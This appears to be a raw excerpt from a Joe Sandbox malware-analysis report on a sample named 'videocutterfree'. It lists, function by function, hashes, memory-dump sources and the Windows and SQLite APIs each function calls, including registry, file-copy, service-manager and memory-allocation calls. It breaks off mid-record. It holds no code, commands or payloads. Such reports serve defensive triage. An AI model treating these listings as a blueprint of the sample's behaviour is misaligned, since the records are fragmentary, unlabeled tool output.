                                                                              • Opcode ID: 60c6d250dd8deafff80095abf1aff810b165ed4452ff0b193a1f032e3edf02ec
                                                                              • Instruction ID: c37de035f001e2575d72327a0c5cf83c98fb28e17e726e10f7ca0a9de17df0c3
                                                                              • Opcode Fuzzy Hash: 60c6d250dd8deafff80095abf1aff810b165ed4452ff0b193a1f032e3edf02ec
                                                                              • Instruction Fuzzy Hash: 12E0B631B00216CBCB00DF68D9D899A77B4FF457407944566E812EB281D3B4DE928F89
                                                                              APIs
                                                                                • Part of subcall function 009A4A0A: __getptd_noexit.LIBCMT ref: 009A4A0B
                                                                                • Part of subcall function 009A4A0A: __amsg_exit.LIBCMT ref: 009A4A18
                                                                                • Part of subcall function 009A2243: __getptd_noexit.LIBCMT ref: 009A2247
                                                                                • Part of subcall function 009A2243: __freeptd.LIBCMT ref: 009A2261
                                                                                • Part of subcall function 009A2243: RtlExitUserThread.NTDLL(?,00000000,?,009A2223,00000000), ref: 009A226A
                                                                              • __XcptFilter.LIBCMT ref: 009A222F
                                                                                • Part of subcall function 009A7B44: __getptd_noexit.LIBCMT ref: 009A7B48
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                              • String ID:
                                                                              • API String ID: 1405322794-0
                                                                              • Opcode ID: 6cb8603573858b22b8b06a2303f1203154468118029d035cbefa90d28a724df3
                                                                              • Instruction ID: 1a66f6e972aa394491fdd7cb0b029c94326daa38727df699a12b2f20889ad1ef
                                                                              • Opcode Fuzzy Hash: 6cb8603573858b22b8b06a2303f1203154468118029d035cbefa90d28a724df3
                                                                              • Instruction Fuzzy Hash: CDE0ECB1D446009FDB08ABE4C90AF6EB764EFC6311F200189F1019B2A2CAB4A940DA65
                                                                              APIs
                                                                              • RegCreateKeyExA.KERNEL32(80000002), ref: 0040B20A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: c180f83c92dcf548fa8beb38ef1c74d29429782547c7cfcdca1407f97ebc0979
                                                                              • Instruction ID: b93f1b6f92246b3ccca9399eed210d9ae217db7478896dc1bd7db65c6538cfba
                                                                              • Opcode Fuzzy Hash: c180f83c92dcf548fa8beb38ef1c74d29429782547c7cfcdca1407f97ebc0979
                                                                              • Instruction Fuzzy Hash: C7C01230A08204EAD61497109E48B653164D704704F6001B7A217B00E1D7795A51A64F
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CopyFile
                                                                              • String ID:
                                                                              • API String ID: 1304948518-0
                                                                              • Opcode ID: a6358ab3cc79e14e82603d5f199a7856aed5ca52aba2b33e0a7ace2c61ca735d
                                                                              • Instruction ID: 54060a4e0b486021d2bf17a4fda6439c3ee528ddcad21b09b779643b4c2b8e72
                                                                              • Opcode Fuzzy Hash: a6358ab3cc79e14e82603d5f199a7856aed5ca52aba2b33e0a7ace2c61ca735d
                                                                              • Instruction Fuzzy Hash: 54C08C3014C019EAC208C6158E4CABA336CEB0478072008F7E40BB00D0C3BE895238AF
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              • Opcode ID: 0e2b379bf8df701bb9e082e776da21589b68423da4ce35769c4f870e9723cc29
                                                                              • Instruction ID: ea951d0eccb75a7dd8fe07b242e29be16940140a29eaeeef510a8f524cfeef0c
                                                                              • Opcode Fuzzy Hash: 0e2b379bf8df701bb9e082e776da21589b68423da4ce35769c4f870e9723cc29
                                                                              • Instruction Fuzzy Hash: C2C01230A48002FACB208FA0AA48A3E7A70AA04340B2008B78413B04D4C3BC96227ACF
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CopyFile
                                                                              • String ID:
                                                                              • API String ID: 1304948518-0
                                                                              • Opcode ID: dbdd877f476e8134daa8ff70989df59b7b8849df53038c5e9e8b7bfa8d6e9606
                                                                              • Instruction ID: 0a6c0003d17810818e32e24976937379b2793755e25390275a802eca79c3ec72
                                                                              • Opcode Fuzzy Hash: dbdd877f476e8134daa8ff70989df59b7b8849df53038c5e9e8b7bfa8d6e9606
                                                                              • Instruction Fuzzy Hash: 22C09B601C8269B6D30457E14D0EB95791CD715741F1045FB7997750D151780191D79E
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: ManagerOpen
                                                                              • String ID:
                                                                              • API String ID: 1889721586-0
                                                                              • Opcode ID: 3fa753fb73a540c0916ca73acc636f1dcb7bfad35fc92f5c6bf39a121cc6d1ef
                                                                              • Instruction ID: ad066ec69485dcbaac9b589d4921c08d31822fb91ba140c5fda6e17a31976777
                                                                              • Opcode Fuzzy Hash: 3fa753fb73a540c0916ca73acc636f1dcb7bfad35fc92f5c6bf39a121cc6d1ef
                                                                              • Instruction Fuzzy Hash: 0DB002A054C012EDC1945B515FEC42615DD555035D37104F69313B41D086794556F57F
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 1010af68774c6642705389abd77bc66d133db9020c51050a88a09524247ea922
                                                                              • Instruction ID: 32a768b1ba534ed717a7f305b72077e06fad21f955be0025f9171a67e1c04a99
                                                                              • Opcode Fuzzy Hash: 1010af68774c6642705389abd77bc66d133db9020c51050a88a09524247ea922
                                                                              • Instruction Fuzzy Hash: DCA01130888000F2C0020380AE0883A28C0A80C302A3200332A03300C082BCA802AAAF
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: b6e7345cffe73231bd9e5143992b409c7d83c170da0dcb2fb64b5df87bf3876c
                                                                              • Instruction ID: 987c6a75a6226e701e9f8a1ca7a7810206e9db859ea14dfcce9dfbd1b39b6ad5
                                                                              • Opcode Fuzzy Hash: b6e7345cffe73231bd9e5143992b409c7d83c170da0dcb2fb64b5df87bf3876c
                                                                              • Instruction Fuzzy Hash: 050188B114D304AFE301BE1BECC597BFBE8EB94625F15492DE6C142600D6726400C5A7
                                                                              APIs
                                                                                • Part of subcall function 009A03C0: OpenEventA.KERNEL32(00100002,00000000,00000000,F3247817), ref: 009A0460
                                                                                • Part of subcall function 009A03C0: CloseHandle.KERNEL32(00000000), ref: 009A0475
                                                                                • Part of subcall function 009A03C0: ResetEvent.KERNEL32(00000000,F3247817), ref: 009A047F
                                                                                • Part of subcall function 009A03C0: CloseHandle.KERNEL32(00000000,F3247817), ref: 009A04B4
                                                                              • TlsSetValue.KERNEL32(00000029,?), ref: 009A0F5A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEventHandle$OpenResetValue
                                                                              • String ID:
                                                                              • API String ID: 1556185888-0
                                                                              • Opcode ID: 804554f55c0dad44eaf002ce38e2e2514ef9ed8ef838a34c2bbdfea1d4c53187
                                                                              • Instruction ID: 1728b23177ca7267678b33aeb1e0883989dabe1830d0b43ef5fb046e659d7586
                                                                              • Opcode Fuzzy Hash: 804554f55c0dad44eaf002ce38e2e2514ef9ed8ef838a34c2bbdfea1d4c53187
                                                                              • Instruction Fuzzy Hash: 2A018F71A04604AFC710CF59DC05F5ABBA8FB86734F10471AF425D3280D735690086E0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: bdcbebdbb6f7f15db4c7dc23eff07e3951114280834d8a789c7b08a2081e1bed
                                                                              • Instruction ID: 106c0a3ac4104c52ca0c4bf1734aa1faa3d9ef1625e580a375a7fcf7657d485c
                                                                              • Opcode Fuzzy Hash: bdcbebdbb6f7f15db4c7dc23eff07e3951114280834d8a789c7b08a2081e1bed
                                                                              • Instruction Fuzzy Hash: B9F02B7404C217CDD21452242A9977E1150E754B46F34043BEA07B51D1CF3C4883AADF
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 1586166983-0
                                                                              • Opcode ID: 3768390100765dd0fd7840000bb8a7e091128b14aca901e81db2f5b459eb6439
                                                                              • Instruction ID: 6e7810caeff14979593a4a6671e498cc303bad7c51c3d073012bd32aba86b7fc
                                                                              • Opcode Fuzzy Hash: 3768390100765dd0fd7840000bb8a7e091128b14aca901e81db2f5b459eb6439
                                                                              • Instruction Fuzzy Hash: B3C04C70504206E9D6005AB28B5D96B29A8592478472544BB9C13F01D1E7BCD412553F
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000), ref: 0040B28E
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 30d1380eaadb09f23ec7e0ddeb671491397bff79c49f0536334363d3717cc57c
                                                                              • Instruction ID: 57a129716cab0bd4cead901bd99eff649662706d8b242c2422a15252d1b08e9a
                                                                              • Opcode Fuzzy Hash: 30d1380eaadb09f23ec7e0ddeb671491397bff79c49f0536334363d3717cc57c
                                                                              • Instruction Fuzzy Hash: 4AC04C75898555DFD6114BA049497A87A20E708741F110022E64AB72D0C7B54451D7DD
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 73fed765b227eaac477385221a85e0eb4651587fd74d8b3cb72dbdec540241b5
                                                                              • Instruction ID: 3609f3ce3d0b6f4b261cca4940c1d46437d504f5e24200c5344ae7737e00abed
                                                                              • Opcode Fuzzy Hash: 73fed765b227eaac477385221a85e0eb4651587fd74d8b3cb72dbdec540241b5
                                                                              • Instruction Fuzzy Hash: 51B01130288A00EAC2000B20AB0CB22BAB0BB00302F220022A203300E083BE0022EA8E
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 1586166983-0
                                                                              • Opcode ID: b86762fbc5d2eaacca143bc44e9b2eef66b47abdd0d10d6d04055930ed55f9a4
                                                                              • Instruction ID: c75203fa9b3db16dba050bbc6d6b43a70eabb19d8f0458744ca12ca473408abb
                                                                              • Opcode Fuzzy Hash: b86762fbc5d2eaacca143bc44e9b2eef66b47abdd0d10d6d04055930ed55f9a4
                                                                              • Instruction Fuzzy Hash: 4C900230244101DEE6014A725A1C21525946504781312447D5807F0190D67980215529
                                                                              APIs
                                                                              • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                              • sqlite3_step.SQLITE3 ref: 6096755A
                                                                              • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                              • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                              • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                              • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                              • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                              • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                              • sqlite3_step.SQLITE3 ref: 609679C3
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                              • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                              • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                              • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                              • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                              • sqlite3_step.SQLITE3 ref: 60967B94
                                                                              • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                              • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                              • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                              • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                              • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                              • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                              • memcmp.MSVCRT ref: 60967D4C
                                                                              • sqlite3_free.SQLITE3 ref: 60967D69
                                                                              • sqlite3_free.SQLITE3 ref: 60967D74
                                                                              • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                              • sqlite3_free.SQLITE3 ref: 60968002
                                                                                • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                              • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                              • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                              • sqlite3_reset.SQLITE3 ref: 60968035
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                              • sqlite3_step.SQLITE3 ref: 609680D1
                                                                              • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                              • sqlite3_reset.SQLITE3 ref: 60968104
                                                                              • sqlite3_step.SQLITE3 ref: 60968139
                                                                              • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                              • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                              • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                              • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                              • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                              • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                              • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                              • sqlite3_step.SQLITE3 ref: 6096764C
                                                                              • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                              • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                              • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                              • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                              • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                              • sqlite3_step.SQLITE3 ref: 609690E6
                                                                              • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                              • sqlite3_free.SQLITE3 ref: 60969102
                                                                              • sqlite3_free.SQLITE3 ref: 6096910D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                              • String ID: $d
                                                                              • API String ID: 2451604321-2084297493
                                                                              • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                              • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                              • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                              • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                              APIs
                                                                              • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                              • sqlite3_free.SQLITE3 ref: 60966183
                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                              • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                              • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                              • memcmp.MSVCRT ref: 6096639E
                                                                                • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                              • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                              • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                              • String ID: ASC$DESC$x
                                                                              • API String ID: 4082667235-1162196452
                                                                              • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                              • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                              • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                              • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                              APIs
                                                                              • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                              • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                              • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                              • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                              • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                              • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                              • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                              • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                              • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                              • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                              • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                              • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                              • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                              • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                              • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                              • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                              • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                              • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                              • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                              • String ID:
                                                                              • API String ID: 961572588-0
                                                                              • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                              • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                              • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                              • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
